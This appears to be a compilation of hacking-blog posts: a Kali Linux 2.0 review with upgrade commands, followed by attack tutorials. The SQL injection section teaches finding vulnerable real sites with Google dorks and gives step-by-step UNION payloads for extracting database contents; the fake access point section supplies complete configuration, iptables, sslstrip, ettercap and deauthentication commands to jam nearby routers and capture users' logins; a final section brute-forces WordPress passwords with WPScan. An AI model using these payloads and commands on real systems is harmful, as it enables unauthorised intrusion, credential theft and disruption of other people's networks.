Improved Features Of New Kali Linux 2.0 And How To Upgrade To It

Kali 2.0 (Kali Sana) was released last week which means that we get to spend some time sifting through Offensive Security‘s latest release looking at all the new tools and tricks. Offensive Security promised us a better, more powerful penetration testing platform, and my preliminary look at 2.0 shows that they delivered.

Here is my previous article about kali linux 1.0: An Introduction To Hacker’s OS: Kali Linux Setup Tutorial

Kali Linux 2.0 (Kali Sana) is the best Penetration testing distribution,well organized and with core tools and packages needed by Pentester to get started right after installation. Kali Linux 2.0 will be a rolling distribution and updates will be pulled continuously from debian testing. Kali 2.0 is based on debian 8 and available in lots of flavors. Kali Linux 2.0 ( Kali Sana) natively supports different desktop environments like xfce,gnome3,kde, mate,lxde,e.t.c

The Look Of Kali Linux 2.0

Kali 2.0 switched over to the GNOME3 interface which brings a much needed update to the user experence. This new UI gives you a customizable favorites bar, which will certainly come in handy, having your common tools at the ready at all times. The new Applications menu in the top bar comes with new, easier-to-understand groupings. This is wonderful if you’d like to have a quick glance at all of your available applications.

Better still, Kali 2.0 also natively supports KDE, Xfce, MATE, e17, lxde and i3wm so if you’re not a fan of the default, you can switch fairly easily to one that you’re more fond of.

The Tools

Kali 2.0 includes a variety of previously-unavailable-by-default toolset including Maltego, Responder from SpiderLabs, and a sleu of wireless penetration testing tools. All of these and more are accessible through the the multi-level navigation mentioned previously.

The Updates

One of my personal concerns with the previous version of Kali was that updates weren’t frequent enough and tools weren’t updated as often as they should. Kali 2.0 is now a rolling distribution, meaning more updates to both the operating system and the natively supported tools.

Improved Features of Kali Linux 2.0

This version of kali Linux is highly expected among the world. Because the teaser which was released by OPSC about this project became viral in internet. It was a 3.13 mins teaser which describes the new features added to the 2.0 version of this Kali Linux. Let’s see the new features added to this version of Kali Linux briefly.

1. Multi-Tasking :

Multi Tasking Feature Seen at Right Side Of Desktop

It is the best feature of Kali Linux v.2.0 that I wish to mention here. It has multi taking feature such as android. The bitter truth is, the multi tasking feature in Kali Linux v.2.0 is better than they of multi tasking in android. It enables the user to run 10+ programs at instant. The experience of this feature depends upon the hardware of the system. All though it has multi tasking feature, making it perfect needs a good compeer or laptop with better specifications. Or else, it may not respond and led to force close of application. Whenever the usage of any feature exceeds, it leads to force close. This is common in all the operating system.

2. Redesigned User Interface :

However the operating system is powerful, the interface and display gives the a user, a sense of exploit. Kali Linux always gives us that feel. This version has a redesigned user interface. This gives us a streamlined working experience. The user interface of this version is really awesome and provides you, a smooth exploiting experience.

3. Restructured Menu and Tool Categories:

This adds beauty to this new version of llinux. Not only beauty, but also an feel of pentrstion testing.

4. Weekly Upstream Updates of Core Toolsets:

 Users can either update it manually or automatically.

5. Native Ruby 2.0 Faster Metasploit Load Times :

Metasploit is one of the best tool used in Kali Linux. Considering the usage of this Metasploit, Makers of this Linux had given some more importance for it’s performence. They had fixed minor bugs and made this Metasploit, a better tool for penetration testing.

6. Built in Desktop Notifications :

This is also one of the best feature found in this version. Users don’t have to install any secondary software or frameworks to get Desktop notifications as out comes inbuilt with the operating system. As same as in android, this version has a notification which can either enabled or disabled by the user. It means that it is customizable. It joins with the Multi taking feature and gives on time notifications so that user won’t miss any important things. User will get notifications whenever a process is started, completed, updated or changed.

7. Built in screen casting :

The users of this penetrating system do not have to depend on secondary software for on screen recording as Screen casting has become a inbuilt feature. This is a nice move by the Team Kali Linux. Most of the features were same as that of in android. It is better to note that android is Linux based. Especially this screen casting, notification and multi tasking features proves that, the features were based on the features of android operating system.

8. Cutting Edge Wireless Penetration Testing Tools :

New Wireless Penetration Testing Tools were also included in this new version of Kali Linux. These tools run in terminal emulator. The main aspect of this tools are wireless penetration testing. Note that Wireless is different from remote. These tools are used for Wifi Cracking, Spoofing, Sniffing, and for other MITM attacks. This has made wireless Penetration testing, easier a lot that before.

How to upgrade to Kali Linux 2.0 (Kali Sana)

Some of you guys are still using Kali Linux 1.x and you wanna upgrade to Kali Linux 2.0 without full clean installation. Well, this can be done though the recommended way of getting Kali Linux 2.0 running smoothly is by performing full clean installation.

To upgrade to Kali Linux 2.0, you'll have to add Kali Sana repositories to your sources.list file, please don't append the kali sana repos, just overwrite existing repositories.

To do this just paste the following lines on your terminal:

cat << EOF > /etc/apt/sources.list
# Regular Repositories
deb http://http.kali.org/kali sana main non-free contrib
deb http://security.kali.org/kali-security sana/updates main contrib non-free
# Source repositories
deb-src http://http.kali.org/kali sana main non-free contrib
deb-src http://security.kali.org/kali-security sana/updates main contrib non-free
EOF

After adding repos, the next thing to do is system update and dist-upgrade, to do this type the following in terminal:

sudo apt-get cleansudo apt-get update
sudo apt-get dist-upgradesudo reboot

If you want to do a fresh installation, head to download page:
Download Kali Linux ISO image

Then get the version of Kali Linux 2.0 that you need. Create a bootable flash drive by using dd command, example is shown below:

dd if=/home/jose/Downloads/kali-linux-1.1.0-amd64.iso of=/dev/sdb bs=512k

Replace if='' With the location of your Kali Linux ISO image. The of option is the output file and specify the destination to write to, e.g /dev/sdb in our case above.

You can use the following command to know your flash drive mount location

sudo fdisk -l

You'll get output similar to one below:

If you are a windows guy, the download win32diskimager, install it and create bootable flash disk. You can also make bootable DVD and boot kali off of it.

Final words

Basically, Offensive Security did a bang-up job upgrading the look and feel of Kali to something more modern and usable. I moved away from Kali 1.0 over the course of its life-cycle due to update and compatibility issues. Of course, as a pentester, logging in and opening a terminal minimizes the importance of the shiny UI (but it is a pretty nice upgrade). Thankfully, regular updates for both the tools and the operating systems are going to be pushed, and for the time being, I will be using Kali 2.0 as my main pentesting platform.

Related Articles:

• Installing Hacker's OS Kali Linux In VMware (Beginners Guide With Screenshots)
• Easy Steps to Create Web Penetration Testing Lab in Kali Linux
• How to Install Kali Linux on Android - Tutorial With Screenshot
• Linux Powerful Distros For Hacking Or Security: Kali, Tails And Qubes
• Setup Kali Linux In Raspberry Pi And Android Device As Screen & Input
• How To Setup Free VPN Service On Kali Linux For Anonymity

Manual SQL Injection - Basic Tutorial For Hack A Website

In this post we will hack a website and obtain its data using SQL injection attack. We will not use any tools. This is one of the few tuts on this blog for which you don't need Kali Linux. You can easily carry it out from Windows machine on any normal browser. If you need to get a big picture of what a SQL injection attack actually does, take a look at this tutorial on How to Hack Website Using Sql Map in Kali Linux - Sql Injection

Finding A Vulnerable Website

The first step is obviously finding a vulnerable website. There are a lot of ways to do so. the most common method of searching is by using dorks.

Dorks

Dorks are an input query into a search engine (Google) which attempt to find websites with the given text provided in the dork itself. Basically it helps you to find websites with a specific code in their url which you know is a sign of vulnerability.

A more specific definition could be "Advanced Google searches used to find security loopholes on websites and allow hackers to break in to or disrupt the site." (from 1337mir)

Using Dorks

Now basically what a dork does is uses Google's "inurl" command to return websites which have a specific set of vulnerable words in url. For that, we need to know which words in the url make a website potentially vulnerable to a SQL injection attack. Many websites offer a comprehensive list of google dorks. For example, the l33tmir website has a list of hundreds of google dorks. However, creativity is your best tool when it comes to finding vulnerable sites, and after practicing with some google dorks, you will be able to create your own. A few dorks have been listed below. What you have to do is paste them into the google search bar and google will return potentially vulnerable sites. NOTE: Don't mind the root@kali:~# behind the code. I have implemented this on all the code on my blog, and the majority of it is really on Kali Linux so it makes sense there but not here.

inurl:"products.php?prodID="

inurl:buy.php?category=

What you have to notice here is the structure of the commands. The inurl instructs google to look at the URLs in it's search index and provide us with the ones which have a specific line in them. Inside the inverted commas is the specific URL which we would expect to see in a vulnerable website. All the vulnerable sites will surely have a .php in their URL, since it is an indicator that this website uses SQL database here. After the question mark you will have a ?something= clause. What lies after the = will be our code that is known to cause malfunctioning of databases and carrying out of a Sql Injection attack.
After you have used the dork, you have a list of potentially vulnerable sites. Most of them though, may not be vulnerable (i.e not the way you want them to be, they might still be having some vulnerabilities you don't know about yet). The second step is finding the actually vulnerable sites from a list of possible ones.

Testing sites for vulnerabilities

Now lets assume we used the first dork, i.e. products.php?prodID=. We then came across a site www.site.com/products.php?prodID=25. Now we have to check if that website is vulnerable or not. This is pretty simple. All you have to do is insert an asterisk ' at the end of the url instead of 25. The url would look somewhat like this www.site.com/products.php?prodID='
If you are lucky, then the site would be vulnerable. If it is, then there would a some kind of error showing up, which would have the words like "Not found","Table","Database","Row","Column","Sql","MysqL" or anything related to a database. In some cases, there would be no error, but there would be some berserk/ unexpected behavior on the page, like a few components not showing up properly, etc.

A typical error message

But right now you only know that the site is vulnerable. You still have to find which colums/rows are vulnerable.

Finding number of columns/rows

Now we need to find the number of columns in the table. For this, we will use trial and error method, and keep executing statements incrementing the number of columns till we get an error message.

www.site.com/products.php?prodID=25+order+by+1

Effectively, we added order by 1 to the end of the original url. If there is atleast one column in the table, then the page will continue to work all right. If not, then an error will be displayed. You can keep increasing the number of columns till you get an error. Lets assume you get an error for

www.site.com/products.php?prodID=25+order+by+6

This means that the page had 5 columns, and the database couldn't handle the query when you asked for the 6th one. So now you know two things

• The site is vulnerable to SQL injection
• It has 5 columns

Now you need to know which of the columns is vulnerable

Finding Vulnerable columns

Now lets assume we are working on our hypothetical site www.site.com which has 5 columns. We now need to find out which of those columns are vulnerable. Vulnerable columns allow us to submit commands and queries to the SQL database through the URL. We now need to find which of the columns is vulnerable. To do this, enter the following into the url

www.site.com/products.php?prodID=25+union+select+1,2,3,4,5

In some cases you might need to put a - behind the 25. The page will now load properly, except for a number showing up somewhere. This is the vulnerable column. Note it down.

Let's say the page refreshes and displays a 2 on the page, thus 2 being the vulnerable column for us to inject into.

Now we know which column is vulnerable. Next part is obtaining the SQL version, since the remaining tutorial will vary depending on which version of SQL is being used.

Unification

From here on, the things will get tough if you are not able to follow what I'm doing. So, we will unify under a single website. This website is intentionally vulnerable to SQL injection, and will prove highly useful since we will be doing the same thing. The purpose of introducing this site at a later stage was to give you an idea how to find vulnerable sites yourself and also find the vulnerable columns. This is what will prove useful in real life. However, to make what follows comparatively easier, we all will now hack the same website. 

The website is: http://testphp.vulnweb.com/

The actual vulnerability is here: http://testphp.vulnweb.com/listproducts.php?cat=1

Notice that the URL has the structure that you now know well. If used properly, a google dork could have led us to this site as well. Now we will replace the 1 with an asterisk '

This is what you vulnerable page looks like to start with

As you can guess, it is vulnerable to SQL injection attack

Now we need to find the number of columns.

10 columns. Nothing so far.

12 columns. Error....

So if there was an error on 12th columns. This means there were 11 columns total. So to find the vulnerable column, we have to execute -

http://testphp.vulnweb.com/listproducts.php?cat=1+union+select+1,2,3,4,5,6,7,8,9,10,11

This does not return any error. As I said before, adding a minus sign (-) after = and before 1 will help.

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,11 

Now we can see total four numbers on the page. 11,7,2 and 9. It won't be hard to figure out which of them depicts the vulnerable column

You can take a look at the page http://testphp.vulnweb.com/listproducts.php?cat=1+union+select+1,2,3,4,5,6,7,8,9,10,11 (no minus sign that is). Now scroll down to the bottom. You will see this-

Comparing the pic with and without the error, we can easily say that the unexpected element in the malfunctioned page is the number 11. We can conclude that 11th column is the vulnerable one. These kind of deductions make hacking very interesting and remind you it's more about logic and creativity than it's about learning up useless code.

Now we are finally where we left out before we changed our stream. We need to find the sql version. It can sometimes be very tricky. But lets hope its not in this case.

Now get the code that told you about the vulnerable column and replace the vulnerable column (i.e. 11) with @@version. The url will look like this.

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,@@version

Now finally you'll see something like

The server is using Sql version 5.1.69, most probably MySQL (pretty common). Also we know the OS is Ubuntu.

And the thing I said about it being tricky sometimes. Sometimes the server does not understand the @@version command directly and you need to convert it. You will need to replace @@version with convert(@@version using latin1) or unhex(hex(@@version)).

Now the information gathering part is complete. We have to move to actual download of tables. Just write down all you know about their database, table and server. You must have a real sense of accomplishment if you have followed the tutorial so far. The boring part always requires maximum motivation and determination.

Extracting tables from SQL database

Now the method to extract data is different depending on the version . Luckily its easier for version 5, and that's what you'll come across most of the time, as is the case this time. All the data regarding the structure of the table is present in the information schema. This is what we're gonna look at first.

In our query which we used to find vulnerable columns (i.e. testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,11), we will replace the vulnerable column with table_name and add prefix +from+information_schema.tables. 

The final url will be

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,table_name+from+information_schema.tables

As you can see, the name of the table is character_sets. However, this is just one table. We can replace the table_name with group_concat(table_name) to get all tables

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(table_name)+from+information_schema.tables

We now have the names of all the tables. Here it is - 

CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,ENGINES,EVENTS,FILES,GLOBAL_STATUS,GLOBAL_VARIABLES,KEY_COLUMN_USAGE,PARTITIONS,PLUGINS,PROCESSLIST,PROFILING,REFERENTIAL_CONSTRAINTS,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,SESSION_STATUS,SESSION_VARIABLES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVIL

As you see, the ending of the last table is incomplete. To correct this, you can modify the end of the url to something like +from+information_schema.tables+where+table_schema=database()

Obtaining columns

It is similar to obtaining tables, other than the fact that we will use information_schema.columns instead of information_schema.tables, and get multiple columns instead of just one using the same group concat. We will also have to specify which table to use in hex. We will use the table events (I've highlighted it above too). In hex it's code is 4556454e5453 (You can use text to hex converter - also prefix 0x behind the code before entering it). The final code will be-

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(column_name)+from+information_schema.columns+where+table_name=0x4556454e5453

We now know the columns of the table events

Extracting data from columns

We will follow the same pattern as we did so far. We had replaced the vulnerable column (i.e. 11) with table_name first, and then column_name. Now we will replace it with the column we want to obtain data from. Lets assume we want the data from the first column in the above pic, ie. event_catalog. We will put the fol. URL-

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,EVENT_CATALOG+from+information_schema.EVENTS 

The page didn't display properly, this means that the our query was fine. The lack of any data is due to the fact that the table was actually empty. We have to work with some other table now. Don't let this failure demotivate you. 

However, our luck has finally betrayed us, and all this time we have been wasting our time on an empty table. So we'll have to look at some other table now, and then look at what columns does the table have. So, I looked at the first table in the list, CHARACTER_SETS and the first column CHARACTER_SET_NAME. Now finally we have the final code as-

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(CHARACTER_SET_NAME)+from+information_schema.CHARACTER_SETS

This table has a lot of data, and we have all the character_sets name.

So finally now you have data from CHARACTER_SET_NAME column from CHARACTER_SETS table . In a similar manner you can go through other tables and columns. It will be definitely more interesting to look through a table whose name sounds like 'USERS' and the columns have name 'USERNAME' and 'PASSWORD'. I would show you how to organize results in a slightly better way and display multiple columns at once. This query will return you the data from 4 columns, seperated by a colon (:) whose hex code is 0x3a.

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(CHARACTER_SET_NAME,0x3a,DEFAULT_COLLATE_NAME,0x3a,DESCRIPTION,0x3a,MAXLEN)+from+information_schema.CHARACTER_SETS

Finally you have successfully conducted an sql injection attack in the hardest possible way without using any tools at all. We will soon be discussing some tools which make the whole process a whole lot easier. However, it is pointless to use tools if you don't know what they actually do.

Recommended Web Hacking Tutorials:

• Kali Linux Tutorial: Manually Creating a Fake AP to Capture Website Logins
• Kali Linux Tutorial: How To Brute Force Wordpress Using Wpscan Tool
• How to Hack Website Using Sql Map in Kali Linux - Sql Injection
• Kali Linux Tutorial: Find Vulnerabilities for Any Website Using Nikto
• Heartbleed Attack: Exploiting OpenSSL Vulnerability Using Metasploit
• Kali Linux Tutorial: Hack a Website login Page Password Using Wireshark

Kali Linux Tutorial: Manually Creating a Fake AP to Capture Website Logins

We'll be setting up a fake access point where we'll be stripping the encryption of sites using HTTPS to HTTP so we can grab the inputs of the username and password fields. We'll also be sending deauthentication packets to all other routers nearby rendering them useless and forcing the user to log into our malicious access point. This can easily be used for attacks known as"waterhole attacks" where you attack a company where the employees don't even notice they are on an malicious AP because it automatically connected to the malicious one due to the other ones being shutdown.

Note: Yes, I do realize some sites are utilizing TLS, so we'll not be able to capture the logins of those sites unfortunately as the encryption mechanism will not be decrypted. (if you know a way to strip the encryption, please tell me!)

Requirements and Lab:

• Kali Linux, If you have no idea about Kali Linux then i recommend you to read this article: An Introduction To Hacker’s OS: Kali Linux Setup Tutorial.
• A network adapter that supports packet injection, monitor mode and master mode.
• Exposure to the Linux environment and a decent amount of wireless penetration experience, Read this tutorial: Kali Linux Tutorial: Wireless Auditing with Aircrack-ng, Reaver, and Pixiewps
• A functional brain that can process information.

Also Read: Easy Steps to Create Web Penetration Testing Lab in Kali Linux

Step 1: Get our default gateway

Open up Kali Linux terminal and You may do this by typing:

Code: [Select]

route -n

Under where it says "Gateway", you'll need to memorize it or write it down as we'll need to use it when we set our IP tables up later on.

Step 2: Now let's install DHCP3-server

Firstly, if you haven't done so already, type:

Code: [Select]

apt-get dist-upgrade
When that is done, now let's install DHCP server by typing:

Code: [Select]

apt-get install dhcp3-server
Now when it's done installing, we need to configure the DHCP server by typing:

Code: [Select]

nano /etc/dhcpd.conf
Now, copy and paste the following in:

Code: [Select]

Authoritative;
Default-lease-time 600;
Max-lease-time 7200;
Subnet 192.168.1.0 netmask 255.255.255.0 {
Option routers 192.168.1.1;
Option subnet-mask 255.255.255.0;
Option domain-name “freewifi”;
Option domain-name-servers 192.168.1.1;
Range 192.168.1.2 192.168.1.40;
}
The only thing you'll need to understand here is the Option domain-name line, where it says "freewifi", you may change that to whatever you want to call your fake (and malicious) access point. For this tutorial, I'll just keep it as freewifi.
Now, just save that by typing CTRL + X and then Y then enter.

Step 3: Now let's begin monitor mode

To begin monitor mode, type:

Code: [Select]

airmon-ng start <wireless interface>
Then to attempt to prevent any issues, type:

Code: [Select]

airmon-ng check kill

Step 4: Begin the fake access point

Now that you have monitor mode all set up, now let's begin the fake access point:

Code: [Select]

airbase-ng -c 11 -e <fake AP name> <monitor mode>
Now you have began the fake AP, however, if you attempt to access it, you won't be able to. Remember to not close that terminal as you need it to be online.

Step 5: Now let's set up the IP table rules

There are a lot of commands here, so I suggest setting up a shell script, and this is how you do it, first type:

Code: [Select]

nano iptables.sh
Now assuming you have basic knowledge of networking, I assume you'll read over this and manually configure some of it as some of it might not work for you.

Code: [Select]

#!/bin/sh
clear
ifconfig at0 192.168.1.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables –t nat –A PREROUTNG –p udp –j DNAT –to <GATEWAY IP HERE>
iptables –P FORWARD ACCEPT
iptables --append FORWARD –-in-interface at0 –j ACCEPT
iptables --table nat -append POSTROUTING --out-interface eth0 –j MASQUERADE
iptables –t nat –A PREROUTING –p tcp –destination-port 80 –j REDIRECT –to-port 10000
Then give it permissions by typing:

Code: [Select]

chmod +x iptables.sh
Then just run it by typing:

Code: [Select]

./iptables.sh

Step 6: Starting the DHCP server

To do this, simply type in:

Code: [Select]

dhcpd –cf /etc/dhcpd.conf –pf /var/run/dhcpd.pid at0
Then to start it, type:

Code: [Select]

/etc/init.d/isc-dhcp-server start

Step 7: Starting SSLSTRIP and Ettercap

I suggest you to read my previous tutorial about Ettercap: Man In The Middle Attack Using Ettercap In Kali Linux

I assume you know what both of these tools are doing, so let's start of by starting SSLSTRIP:

Code: [Select]

sslstrip –f –p –k 10000
Leave that terminal open. Then to begin ettercap, type:

Code: [Select]

ettercap –p –u –T –q –I  at0

Step 8: Sending Deauth packets to all other routers

Firstly, begin scanning for the routers by typing:

Code: [Select]

airodump-ng <monitor mode>
Then, select your target and write down their channel number(s) and BSSID(s). Then set the channels by typing:

Code: [Select]

iwconfig <monitor mode> channel <Ch. Number>
Now, to begin the deauthentication attack, type the following command:

Code: [Select]

aireplay-ng -0 5000 -a <BSSID> <monitor mode> --ignore-negative-one
Congrats, you are done, Now just sit back and wait for the users to log in and gather their data.

Credits: queryFrequency

Recommended Web Hacking Tutorials:

• Kali Linux Tutorial: How To Brute Force Wordpress Using Wpscan Tool
• How to Hack Website Using Sql Map in Kali Linux - Sql Injection
• Kali Linux Tutorial: Find Vulnerabilities for Any Website Using Nikto
• Heartbleed Attack: Exploiting OpenSSL Vulnerability Using Metasploit
• Kali Linux Tutorial: Hack a Website login Page Password Using Wireshark

Kali Linux Tutorial: How To Brute Force Wordpress Using Wpscan Tool

As a WordPress administrator or webmaster you are responsible for the security of the WordPress blog or website you manage. Most probably you’ve already done a lot to beef up the security and today we will show you how to brute force Wordpress password in Kali Linux using Wpscan to checking your Password Strength.

Disclaimer: This tutorial is for educational purposes only and we are NOT responsible in any way for how this information is used, use it at your own risk.


As we now WPScan is a black box WordPress vulnerability scanner, and it is installed by default in kali linux we will use it for brute forcing wordpress, If you have no idea about Kali Linux then i recommend you to read this article: An Introduction To Hacker’s OS: Kali Linux Setup Tutorial.

We will use our wordpress platform that we already installed in our kali linux. If you have not already done visit our article: Complete Guide To Setup Wordpress In Kali Linux With Xampp Server .

Lets's start,

• Open your Kali Linux Terminal and start Xampp server by typing the following command:

root@kali: /opt/lampp/lampp start

• Now we need to Enumerate users, type in terminal:

root@kali: wpscan -u 127.0.0.1/wordpress --enumerate u

• Wpscan will automatically search the admin username.

• Now Do wordlist password brute force on the username, type in terminal:

root@kali: wpscan --url 127.0.0.1/wordpress --wordlist /root/pass --username k4linux

• --wordlist set the location of your Password Wordlist

• --username set the administrator username that you have found

After a search Wpscan will find the password and this will take a few minutes, this depends on your Wordlist.

Efficiency of the Brute Force depend on how much strong is your wordlist and how many password contains it.

Watch the video tutorial for more explanation (Wpscan):

Credits: http://www.k4linux.com/

Recommended Hacking Tutorial:

• How to Hack Website Using Sql Map in Kali Linux - Sql Injection
• Kali Linux Tutorial: Find Vulnerabilities for Any Website Using Nikto
• Heartbleed Attack: Exploiting OpenSSL Vulnerability Using Metasploit
• Kali Linux Tutorial: Hack a Website login Page Password Using Wireshark